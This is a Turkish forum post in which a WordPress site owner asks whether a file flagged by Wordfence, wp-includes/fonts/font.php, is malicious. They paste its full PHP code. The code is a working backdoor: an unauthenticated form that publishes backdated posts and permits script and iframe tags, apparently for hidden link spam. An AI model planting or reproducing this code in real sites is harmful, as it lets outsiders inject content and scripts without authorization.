Merhaba arkadaşlar. Sitemde Wordfence eklentisi mevcut ve oradaki bildirim üzerine tarama sonuçlarına baktığımda
wp-includes/fonts/font.php dosyasının bilinmeyen dosya olduğunu ve yüksek derecede riskli olduğunu belirtiyordu, bilgisayara indirdikten sonra sildim. Sayfa içindeki kodları baştan sona aşağıya bırakıyorum. Bilenler bakabilir mi, bu kodlar virüs mü, siteye hacklink eklemek için mi yazılmıştır? Dosya içerisinde wphaberekle gibi şeyler yazıyordu, Wordpress dosyasında bu olmaz heralde. Eğer hacklinkse, nerelere yerleştirdiğini anlamanın bir yolu var mı?
<?php
include("../../wp-load.php");
?>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<div id="" style="margin-bottom:10px;border:1px dotted gray;padding:5px;">
<form name="form1" id="form1" method="post">
<table align="center">
<tr><td>Baslik:</td><td><input name="baslik" id="baslik" value="" style="width:300px;"/></td></tr>
<tr>
<td width= "100">
Yazi:</td><td><textarea name="icerik" rows="15" cols="50"></textarea></td></tr>
<tr><td>Kategori</td><td>
<?php wp_dropdown_categories("name=kat"); ?>
</td></tr>
<tr><td>
</td></tr>
</table></div>
<input type="submit" name="ekle" value="Ekle" />
</form>
<?
if (isset($_POST['ekle'])) {
$baslik = $_POST['baslik'];
$kategori = $_POST['kat'];
$icerik = $_POST['icerik'];
wphaberekle($baslik,$resim,$icerik,$kategori) ;
}
function wphaberekle($baslik=null,$resim=null,$icerik=null,$link=null,$etiket=null,$kategori=null) {
//print_r($kategori);
//exit();
global $wpdb;
global $allowedposttags;
$allowedposttags['div'] = array('align' => array (), 'class' => array (), 'id' => array (), 'dir' => array (), 'lang' => array(), 'style' => array (), 'xml:lang' => array() );
$allowedposttags['script'] = array('src' => array () );
$allowedposttags['iframe'] = array('src' => array () , 'width' => array (), 'height' => array (),'frameborder' => array () );
$allowedposttags['object'] = array('src' => array (), 'width' => array (), 'height' => array (), 'id' => array (), 'align' => array (), 'classid' => array (), 'type' => array (),'data' => array () );
$allowedposttags['embed'] = array('src' => array () );
$allowedposttags['param'] = array('name' => array (),'value' => array () );
$eski = date("Y") - 1;;
$yil = date("m-d H:i:s");
$ilerit = $eski.'-'.$yil;
$kontrol = get_page_by_title($baslik,OBJECT,"post");
if ($kontrol) {
$kontrol = "1";
} else {$kontrol = "0"; }
if ($icerik==""){
$result[0] = FALSE;
echo '<strong>bos icerik eklenemedi</strong> ' . $baslik.'<br>';
return $result;
}
if ($kontrol=="1"){
$result[0] = FALSE;
echo '<strong>Zaten Eklenmis:</strong> ' . $baslik.'<br>';
return $result;
}
$tags = explode(',',$etiket);
$post = array();
$post['post_title'] = $baslik;
$post['post_content'] = $icerik;
$post['post_status'] = 'publish';
$post['post_type'] = 'post';
$post['post_date'] = $ilerit;
$post['post_date_gmt'] = $ilerit;
$post['post_category'] = array($kategori) ;
$post = array_merge((array)$post, (array)$post2);
//printr($post);
$post_id = wp_insert_post($post);
$guid = get_permalink($post_id);
wp_set_post_tags( $post_id, $tags, true );
$result[0] = TRUE;
echo '<strong>Eklendi:</strong> ' . $baslik.' - icerige gitmek icin <a href="'.$guid.'" target="_blank">tiklayiniz</a><br>';
return $result;
}
?>